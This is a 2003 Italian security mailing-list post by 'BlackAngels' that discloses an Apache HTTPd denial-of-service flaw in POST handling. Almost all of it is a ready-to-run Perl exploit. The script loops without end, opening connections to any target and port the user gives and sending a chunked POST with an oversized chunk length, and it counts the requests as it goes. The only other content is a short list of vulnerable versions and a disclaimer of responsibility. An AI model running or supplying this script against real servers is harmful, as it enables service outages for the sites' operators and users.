[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Novembre 2003 ml@sikurezza.org Soggetto: Apache HTTPd Denial of Service in POST parameter Mittente: BlackAngels Data: 24 Nov 2003 22:38:56 -0000
[ APACHE HTTPD DENIAL OF SERVICE IN POST PARAMETER ]
{ Vulnerable systems }
Apache webserver 1.2.x ( x < 26 )
Apache webserver 2.0.x
{ Exploit's code }
#!/usr/bin/perl -w
# Apache HTTPd Denial of Service exploit in POST parameter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities for an incorrect
# or illegal use of the informations supplied with this paper or for
# eventual damages to others systems.
#
# For more informations :
# [ http://www.blangels.it ] - ( staff@xxxxxxxxxxx )
use IO::Socket;
if(@ARGV == 2){
my $target = $ARGV[0];
my $port = $ARGV[1];
my $count;
print "\nApache webserver Denial of Service exploit in POST parameter";
print "\nVulnerable versions: 1.2.26 or previous and 2.0.x";
print "\n============================================================\n";
while(){
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => "$port",
Proto => 'tcp');
unless($sock){
die "Couldn't connect ...";
}
$sock->autoflush(1);
print $sock "POST /foo.htm HTTP/1.1\nHost: $target\nTransfer-Encoding:
chunked\n\n90000000\n\n";
while ( <$sock> ){
print;
}
close $sock;
$count++;
print "Status: $count requests sent ...\n";
}
}else{
print "\nUsage: ./$0 [target] [port]\n";
}
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005